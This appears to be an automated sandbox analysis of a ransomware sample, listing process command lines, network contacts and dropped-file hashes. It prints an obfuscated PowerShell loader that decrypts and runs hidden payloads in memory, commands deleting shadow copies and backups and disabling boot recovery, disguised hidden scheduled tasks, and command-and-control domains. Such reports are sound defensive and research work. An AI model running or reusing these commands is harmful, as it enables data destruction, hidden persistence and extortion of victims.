coZUI($OpQVj){$aZVET=[System.Security.Cryptography.Aes]::Create();$aZVET.Mode=[System.Security.Cryptography.CipherMode]::CBC;$aZVET.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$aZVET.Key=[System.Convert]::$uvnc('iQPIhpce7ki6o+IHmlOhdoHm7HC8khIfOxAgdAkNw7A=');$aZVET.IV=[System.Convert]::$uvnc('NkX2UOU09KDD8//UYPJBsg==');$RGpCI=$aZVET.$kkEJ();$aARwL=$RGpCI.$OtLn($OpQVj,0,$OpQVj.Length);$RGpCI.Dispose();$aZVET.Dispose();$aARwL;}function fvMWD($OpQVj){$EEpkF=New-Object System.IO.MemoryStream(,$OpQVj);$pDChj=New-Object System.IO.MemoryStream;$BBOEV=New-Object System.IO.Compression.GZipStream($EEpkF,[IO.Compression.CompressionMode]::Decompress);$BBOEV.CopyTo($pDChj);$BBOEV.Dispose();$EEpkF.Dispose();$pDChj.Dispose();$pDChj.ToArray();}$YoalJ=[System.Linq.Enumerable]::$QmQC([System.IO.File]::$JsiC([System.IO.Path]::$eVXi([System.Diagnostics.Process]::$Abka().$KwUx.FileName, $null)), 1);$ZnOcq=$YoalJ.Substring(2).$xxaz(':');$njBYj=fvMWD (coZUI ([Convert]::$uvnc($ZnOcq[0])));$BkieQ=fvMWD (coZUI ([Convert]::$uvnc($ZnOcq[1])));[System.Reflection.Assembly]::$Cvyq([byte[]]$BkieQ).$oAYO.$Nyws($null,$null);[System.Reflection.Assembly]::$Cvyq([byte[]]$njBYj).$oAYO.$Nyws($null,$null);

C:\Users\Admin\AppData\Local\Temp\SRD.bat.exe

"C:\Users\Admin\AppData\Local\Temp\SRD.bat.exe" -w hidden -c $RwDC='InVBDevokVBDeeVBDe'.Replace('VBDe', '');$IGVN='CreVBDeatVBDeeDecVBDeryptVBDeorVBDe'.Replace('VBDe', '');$qKLC='LoaVBDedVBDe'.Replace('VBDe', '');$fwfx='TVBDeranVBDesfVBDeorVBDemVBDeFinVBDeaVBDelVBDeBlVBDeocVBDekVBDe'.Replace('VBDe', '');$QupE='FrVBDeoVBDemBaVBDese6VBDe4StVBDeriVBDengVBDe'.Replace('VBDe', '');$GEjb='ChVBDeangVBDeeEVBDextVBDeenVBDesionVBDe'.Replace('VBDe', '');$XbqZ='ReaVBDedLiVBDenesVBDe'.Replace('VBDe', '');$dNNl='ElVBDeemeVBDentVBDeAtVBDe'.Replace('VBDe', '');$niMU='EVBDentVBDeryPVBDeoinVBDetVBDe'.Replace('VBDe', '');$CXFs='GetCVBDeurVBDereVBDenVBDetPVBDerocVBDeessVBDe'.Replace('VBDe', '');$tMEM='SplVBDeitVBDe'.Replace('VBDe', '');$yGFh='MaVBDeinVBDeModVBDeulVBDeeVBDe'.Replace('VBDe', '');function RcHQK($SJfnN){$ePbJG=[System.Security.Cryptography.Aes]::Create();$ePbJG.Mode=[System.Security.Cryptography.CipherMode]::CBC;$ePbJG.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$ePbJG.Key=[System.Convert]::$QupE('JDkzO6XH5gH021W2Y/ObVS2k+/ofiQdjxBF86RM/vL8=');$ePbJG.IV=[System.Convert]::$QupE('TPQFXcwHNdZ9KljZbDDnEA==');$uQtJU=$ePbJG.$IGVN();$QRiSY=$uQtJU.$fwfx($SJfnN,0,$SJfnN.Length);$uQtJU.Dispose();$ePbJG.Dispose();$QRiSY;}function nTqSF($SJfnN){$vKyUA=New-Object System.IO.MemoryStream(,$SJfnN);$flWoW=New-Object System.IO.MemoryStream;$gLlPI=New-Object System.IO.Compression.GZipStream($vKyUA,[IO.Compression.CompressionMode]::Decompress);$gLlPI.CopyTo($flWoW);$gLlPI.Dispose();$vKyUA.Dispose();$flWoW.Dispose();$flWoW.ToArray();}$fsXoM=[System.Linq.Enumerable]::$dNNl([System.IO.File]::$XbqZ([System.IO.Path]::$GEjb([System.Diagnostics.Process]::$CXFs().$yGFh.FileName, $null)), 1);$JMYTy=$fsXoM.Substring(2).$tMEM(':');$fhNaK=nTqSF (RcHQK ([Convert]::$QupE($JMYTy[0])));$Prmhn=nTqSF (RcHQK ([Convert]::$QupE($JMYTy[1])));[System.Reflection.Assembly]::$qKLC([byte[]]$Prmhn).$niMU.$RwDC($null,$null);[System.Reflection.Assembly]::$qKLC([byte[]]$fhNaK).$niMU.$RwDC($null,$null);

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\SRD')

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\sv')

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(1652);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(192);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\users\public\desktop\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "F:\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe"

C:\Windows\system32\vssadmin.exe

vssadmin delete shadows /all /quiet

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled no

C:\Windows\system32\wbadmin.exe

wbadmin delete catalog -quiet

C:\Users\Admin\AppData\Roaming\hhftgie

C:\Users\Admin\AppData\Roaming\hhftgie

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneDrive_TbvDl' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\TbvDl.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneDrive_TYjHE' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\TYjHE.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force

C:\Users\Admin\AppData\Roaming\hhftgie

C:\Users\Admin\AppData\Roaming\hhftgie

C:\Users\Admin\AppData\Local\Temp\bwll.exe

C:\Users\Admin\AppData\Local\Temp\bwll.exe

C:\Users\Admin\AppData\Local\Temp\bwll.exe

C:\Users\Admin\AppData\Local\Temp\bwll.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 serverlogs37.xyz udp
US 8.8.8.8:53 servblog757.xyz udp
DE 45.89.127.159:80 servblog757.xyz tcp
US 8.8.8.8:53 159.127.89.45.in-addr.arpa udp
NL 145.14.157.71:80 145.14.157.71 tcp
US 8.8.8.8:53 71.157.14.145.in-addr.arpa udp
US 8.8.8.8:53 septrex45.xyz udp
EE 159.253.18.136:80 septrex45.xyz tcp
US 8.8.8.8:53 136.18.253.159.in-addr.arpa udp
DE 45.89.127.159:80 servblog757.xyz tcp
US 20.189.173.14:443 tcp
US 8.8.8.8:53 86.8.109.52.in-addr.arpa udp
DE 45.89.127.159:80 servblog757.xyz tcp
US 8.8.8.8:53 adstat277xm.xyz udp
DE 45.89.125.136:4044 adstat277xm.xyz tcp
US 8.8.8.8:53 136.125.89.45.in-addr.arpa udp
US 8.8.8.8:53 septrex45.xyz udp
EE 159.253.18.136:80 septrex45.xyz tcp

Files

memory/2432-122-0x0000000000400000-0x0000000000409000-memory.dmp

memory/2156-123-0x0000000001C70000-0x0000000001C79000-memory.dmp

memory/2432-124-0x0000000000400000-0x0000000000409000-memory.dmp

memory/2432-126-0x0000000000400000-0x0000000000409000-memory.dmp

memory/3200-125-0x0000000000AF0000-0x0000000000B06000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\FFA2.exe

MD5 6992433acbb1398c0b539d1cafdf47c4
SHA1 6761b00b2843b79ce8840d1b80170d8e13b588da
SHA256 5d5d5d0c1228f5b2f5589bdf7c247733ed40a0259a2d5969c75b9eb25a8b2304
SHA512 2dca1c59d8c56ebb41c7fef0f780318da299c91f25a9829d10327f5a70ccec40b0260a46554203c6a3d28fce80505f6b025e974cae201e6ff3724abc4a6bc6bc

C:\Users\Admin\AppData\Local\Temp\FFA2.exe

MD5 6992433acbb1398c0b539d1cafdf47c4
SHA1 6761b00b2843b79ce8840d1b80170d8e13b588da
SHA256 5d5d5d0c1228f5b2f5589bdf7c247733ed40a0259a2d5969c75b9eb25a8b2304
SHA512 2dca1c59d8c56ebb41c7fef0f780318da299c91f25a9829d10327f5a70ccec40b0260a46554203c6a3d28fce80505f6b025e974cae201e6ff3724abc4a6bc6bc

C:\Users\Admin\AppData\Local\Temp\233.exe

MD5 0f281d2506515a64082d6e774573afb7
SHA1 8949f27465913bf475fceb5796b205429083df58
SHA256 2288a0c896757647538a7dab5e0c980b70b173ed36c9e6206f6701dfd4112cfb
SHA512 f4ddb22c7dec04ca862d3df88e285025e02c185dbb2c061e9d0092ba3e8e8e083ca55612aae6b2d5792038729c55c0eaf193048991c0b06c8639a52017102622

C:\Users\Admin\AppData\Local\Temp\233.exe

MD5 0f281d2506515a64082d6e774573afb7
SHA1 8949f27465913bf475fceb5796b205429083df58

C:\Users\Admin\AppData\Local\Temp\30C4\C\Windows\InfusedApps\Packages\Microsoft.Wallet_1.0.16328.0_x64__8wekyb3d8bbwe\images\WalletSquare44x44Logo.targetsize-24_altform-unplated.png

MD5 2bb84fb822fe6ed44bf10bbf31122308
SHA1 e9049ca6522a736d75fc85b3b16a0ad0dc271334
SHA256 afb6768acc7e2229c7566d68dabf863bafdb8d59e2cca45f39370fc7261965dc
SHA512 1f24ca0e934881760a94c1f90d31ef6ccbab165d39c0155fb83b31e92abe4e5e3b70f49189f75d8cdd859796a55312f27c71fda0b8296e8cf30167a02d7391f5

C:\Users\Admin\AppData\Local\Temp\30C4\C\Windows\InfusedApps\Packages\Microsoft.Wallet_1.0.16328.0_x64__8wekyb3d8bbwe\images\WalletSquare44x44Logo.scale-200.png

MD5 1572efa3e47162a7b2198893a362b803
SHA1 a291f6f1cae15d03d5ef0f748b83bee024aa2fca
SHA256 d39fb03894ed83d57acf16976ae256c9912bd7e9feb63cb5c85709e1617e90dc
SHA512 4267d64626b808e9b338d973335794a5b3c3586c26fb0d11c96b07c2ad551486150449d83d5ae2756451c32365a8877a0c59592e5b173a27142464787de7ff45

C:\Users\Admin\AppData\Local\Temp\30C4\C\Windows\InfusedApps\Packages\Microsoft.Wallet_1.0.16328.0_x64__8wekyb3d8bbwe\images\WalletSquare150x150Logo.scale-200.png

MD5 0262d1daca4c1c1e22dec63b012e3641
SHA1 609258b00f17f2a9dd586fe5a7e485573ef477c9
SHA256 8b0ccafcace92ee624e057fa91550d306efd5dc21bb0c850c174ef38d79754fc
SHA512 a1ad7e32bfabfa4ecf32be9ab96db5c84ecf48a8b8a6e267cb106281e119669fed0fb12eaea024e21aa2f13de8f14fa0b805f869b53ec85524b60dc1db7743d0

C:\Users\Admin\AppData\Local\Temp\30C4\C\Windows\InfusedApps\Packages\Microsoft.Wallet_1.0.16328.0_x64__8wekyb3d8bbwe\images\WalletSplashScreen.png

MD5 52bf805c4241200c576401a59f9e211a
SHA1 a10074a87d7c244fcee9b8d45005673aa48140a1
SHA256 adee2dfff644b55f272b54cd8742e886a2bb21623c4f1e6b3058ccf97588d87c
SHA512 9142a45cc68422a51e84ad58858409e7fe711cd120565f0d36d3e7b3f7e9a771e83549d9d852f708a41a511fc0a1989a0315b141ddc122b014f533b0466ad688

C:\Users\Admin\AppData\Local\Temp\30C4\C\Windows\InfusedApps\Packages\Microsoft.Wallet_1.0.16328.0_x64__8wekyb3d8bbwe\images\WalletLockScreenLogo.scale-200.png

MD5 541abea8b402b4ddd7463b2cd1bf54ec
SHA1 e0bfa993adcc35d6cc955be49c2f952529660ad5
SHA256 d436906bb661ba5d0ae3ad2d949b709f92bf50eb79a9faedd7f66d5598e07f16
SHA512 b22478881f719ac94392ef43dbf553c4644e2b3676191cb35c7bd212f496978e5b4e15869d254b96a393314a30e2ce397a6d6bf44cac45a2eff38d997b40c7f6

C:\Users\Admin\AppData\Local\Temp\30C4\C\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Wallet_1.0.16328.0_x64__8wekyb3d8bbwe.xml

MD5 44628eb64853341f7678ec488959efe2
SHA1 60e37cb04f7941b6070d3ce035af3d434c78fbfd
SHA256 f44e196695dffbc9442ab694343447097b8362fccaf4269057890f39da50df2e
SHA512 0134c598e3ada0a5ae47c9803b1c0f248d88a92c5fd79dd2baea7dea82322ff52f8b218be41bd3b72f270fe170ad36df5106d2f21ca51be5f8f3c6791da9d86f

C:\Users\Admin\AppData\Local\Temp\30C4\C\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Wallet_1.0.16328.0_neutral_~_8wekyb3d8bbwe.xml

MD5 5b333e85c957925ec5f7ae9c47872020
SHA1 97431745824321574e6e6c9666e79147b5a6ea67
SHA256 c2c28b18a9bbe65c7f29640ec18d5836fa51ce720b336dc6e44d49ff2d807d08
SHA512 377b42d7a432c597cbf41c5c9f4303592f88a3fef368e53532ec1474529d5d915f264ca1f099c269a4d4bc35fea22d35140d45c099f4fdb66be8cb109b533f80

C:\Users\Admin\AppData\Local\Temp\30C4\C\ProgramData\Microsoft\Windows\AppRepository\Microsoft.Wallet_1.0.16328.0_x64__8wekyb3d8bbwe.xml

MD5 44628eb64853341f7678ec488959efe2
SHA1 60e37cb04f7941b6070d3ce035af3d434c78fbfd
SHA256 f44e196695dffbc9442ab694343447097b8362fccaf4269057890f39da50df2e
SHA512 0134c598e3ada0a5ae47c9803b1c0f248d88a92c5fd79dd2baea7dea82322ff52f8b218be41bd3b72f270fe170ad36df5106d2f21ca51be5f8f3c6791da9d86f

C:\Users\Admin\AppData\Local\Temp\30C4\C\ProgramData\Microsoft\Windows\AppRepository\Microsoft.Wallet_1.0.16328.0_neutral_~_8wekyb3d8bbwe.xml

MD5 5b333e85c957925ec5f7ae9c47872020
SHA1 97431745824321574e6e6c9666e79147b5a6ea67
SHA256 c2c28b18a9bbe65c7f29640ec18d5836fa51ce720b336dc6e44d49ff2d807d08
SHA512 377b42d7a432c597cbf41c5c9f4303592f88a3fef368e53532ec1474529d5d915f264ca1f099c269a4d4bc35fea22d35140d45c099f4fdb66be8cb109b533f80

C:\Users\Admin\AppData\Local\Temp\30C4\C\Program Files\WindowsApps\Microsoft.Wallet_1.0.16328.0_x64__8wekyb3d8bbwe\Microsoft.Wallet.exe

MD5 a4bd1ce8b5026e59037a3903cd6e4e3a
SHA1 352243b758a585cf869cd9f9354cd302463f4d9d
SHA256 39d69cd43e452c4899dbf1aa5b847c2a2d251fb8e13df9232ebdb5f0fdc3594c
SHA512 c86901a1bdcebc5721743fca6ac7f1909b64518e046752f3b412183db940563c088e0ec12613ad0b763c814bc3b6bf99dd3b6f8a6bce54add30a10d29e38400c

C:\Users\Admin\AppData\Local\Temp\30C4\C\Program Files\WindowsApps\Microsoft.Wallet_1.0.16328.0_x64__8wekyb3d8bbwe\images\WalletSplashScreen.png

MD5 52bf805c4241200c576401a59f9e211a
SHA1 a10074a87d7c244fcee9b8d45005673aa48140a1
SHA256 adee2dfff644b55f272b54cd8742e886a2bb21623c4f1e6b3058ccf97588d87c
SHA512 9142a45cc68422a51e84ad58858409e7fe711cd120565f0d36d3e7b3f7e9a771e83549d9d852f708a41a511fc0a1989a0315b141ddc122b014f533b0466ad688

C:\Users\Admin\AppData\Local\Temp\30C4\C\Program Files\WindowsApps\Microsoft.Wallet_1.0.16328.0_x64__8wekyb3d8bbwe\images\WalletSquare44x44Logo.targetsize-24_altform-unplated.png

MD5 2bb84fb822fe6ed44bf10bbf31122308
SHA1 e9049ca6522a736d75fc85b3b16a0ad0dc271334
SHA256 afb6768acc7e2229c7566d68dabf863bafdb8d59e2cca45f39370fc7261965dc
SHA512 1f24ca0e934881760a94c1f90d31ef6ccbab165d39c0155fb83b31e92abe4e5e3b70f49189f75d8cdd859796a55312f27c71fda0b8296e8cf30167a02d7391f5

C:\Users\Admin\AppData\Local\Temp\30C4\C\Program Files\WindowsApps\Microsoft.Wallet_1.0.16328.0_x64__8wekyb3d8bbwe\images\WalletSquare44x44Logo.scale-200.png

MD5 1572efa3e47162a7b2198893a362b803
SHA1 a291f6f1cae15d03d5ef0f748b83bee024aa2fca
SHA256 d39fb03894ed83d57acf16976ae256c9912bd7e9feb63cb5c85709e1617e90dc
SHA512 4267d64626b808e9b338d973335794a5b3c3586c26fb0d11c96b07c2ad551486150449d83d5ae2756451c32365a8877a0c59592e5b173a27142464787de7ff45

C:\Users\Admin\AppData\Local\Temp\30C4\C\Program Files\WindowsApps\Microsoft.Wallet_1.0.16328.0_x64__8wekyb3d8bbwe\images\WalletSquare150x150Logo.scale-200.png

MD5 0262d1daca4c1c1e22dec63b012e3641
SHA1 609258b00f17f2a9dd586fe5a7e485573ef477c9
SHA256 8b0ccafcace92ee624e057fa91550d306efd5dc21bb0c850c174ef38d79754fc
SHA512 a1ad7e32bfabfa4ecf32be9ab96db5c84ecf48a8b8a6e267cb106281e119669fed0fb12eaea024e21aa2f13de8f14fa0b805f869b53ec85524b60dc1db7743d0

C:\Users\Admin\AppData\Local\Temp\30C4\C\Program Files\WindowsApps\Microsoft.Wallet_1.0.16328.0_x64__8wekyb3d8bbwe\Microsoft.Wallet.Background.winmd

MD5 64d3f93322e5e6932ad162365441301d
SHA1 832e1b6e6560f8dae2b8282b72a1d80545ea5891
SHA256 df52db081c34a78391d85832bcb2190a9417fb34e468d5f15e84ac1916a085cc
SHA512 86b8e1f699321c6eb187b597a08bdfdd4b47686681e495783b981ca82cfaaa8be22d1775143cfd0a6d3c7b381b419930609c8370e67a906eba9e1b6a5024eb20

C:\Users\Admin\AppData\Local\Temp\30C4\C\Program Files\WindowsApps\Microsoft.Wallet_1.0.16328.0_x64__8wekyb3d8bbwe\images\WalletWide310x150Logo.scale-200.png

MD5 52bf805c4241200c576401a59f9e211a
SHA1 a10074a87d7c244fcee9b8d45005673aa48140a1
SHA256 adee2dfff644b55f272b54cd8742e886a2bb21623c4f1e6b3058ccf97588d87c
SHA512 9142a45cc68422a51e84ad58858409e7fe711cd120565f0d36d3e7b3f7e9a771e83549d9d852f708a41a511fc0a1989a0315b141ddc122b014f533b0466ad688

C:\Users\Admin\AppData\Local\Temp\30C4\C\Program Files\WindowsApps\Microsoft.Wallet_1.0.16328.0_x64__8wekyb3d8bbwe\images\WalletStoreLogo.png

MD5 08de9d6a366fb174872e8043e2384099
SHA1 955114d06eefae5e498797f361493ee607676d95
SHA256 0289105cf9484cf5427630866c0525b60f6193dea0afacd0224f997ce8103861
SHA512 59004a4920d5e3b80b642c285ff649a2ee5c52df25b6209be46d2f927a9c2ab170534ea0819c7c70292534ee08eb90e36630d11da18edba502776fac42872ed0

C:\Users\Admin\AppData\Local\Temp\30C4\C\Program Files\WindowsApps\Microsoft.Wallet_1.0.16328.0_x64__8wekyb3d8bbwe\images\WalletLockScreenLogo.scale-200.png

MD5 541abea8b402b4ddd7463b2cd1bf54ec
SHA1 e0bfa993adcc35d6cc955be49c2f952529660ad5
SHA256 d436906bb661ba5d0ae3ad2d949b709f92bf50eb79a9faedd7f66d5598e07f16
SHA512 b22478881f719ac94392ef43dbf553c4644e2b3676191cb35c7bd212f496978e5b4e15869d254b96a393314a30e2ce397a6d6bf44cac45a2eff38d997b40c7f6

memory/4952-12661-0x0000000000400000-0x0000000000695000-memory.dmp

C:\info.hta

MD5 b5f673247b9ab1e525c64addb0ffef8e
SHA1 f04fc13ccb91e6c7b4138ab32056e390f0eb9d85
SHA256 8ab2c6439f58882f7ed5f21daef0c03013a5c226b8d78e1e1883918a44aeb713
SHA512 e4006d96145bca196db5e3cd5138ac378b065e0b1713d3ab2ef752ceb861111cf21434ddaf35f385a55253bdc8787a5eff60e855a65dc11c7989e130b8452677

memory/4952-13009-0x0000000000400000-0x0000000000695000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_48.db

MD5 ae6fbded57f9f7d048b95468ddee47ca
SHA1 c4473ea845be2fb5d28a61efd72f19d74d5fc82e
SHA256 d3c9d1ff7b54b653c6a1125cac49f52070338a2dd271817bba8853e99c0f33a9
SHA512 f119d5ad9162f0f5d376e03a9ea15e30658780e18dd86e81812dda8ddf59addd1daa0706b2f5486df8f17429c2c60aa05d4f041a2082fd2ec6ea8cc9469fade3

C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db

MD5 d5f14e76da2b7a406cac9051651405cc
SHA1 120ee8d035aec37b1d77fb85b72b995de1ae8896
SHA256 3aa2d0a600a2a69fe946352bdf92787df4501391c4455cb916a91c303ee603ed
SHA512 57f352c75fb605b39a46d10acb40a35671a65b71f5a52c3b9d8c8d09b58c35a9f94cecd54e049aa0a5cc6eb7732f7e1eaddab3368144d3e2a6c681881fcc1d9d

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_720_POS4.jpg

MD5 2257fa8cef64a74c33655bd5f74ef5e5
SHA1 b9f8baf96166f99cb1983563e632e6e69984ad5c
SHA256 ead48b70e048de6ccca219a229ca90b49a9d1b9c14bf3a7c5eaad544294fcfd3
SHA512 7792be9b935a46a923e97bb76b76957070e116dcc4cb6fcd8b883c2d6f142285ebc9fd26cdf29bd19c8bdff412487f586abaa1724332b613e71afa45d7f3e4f9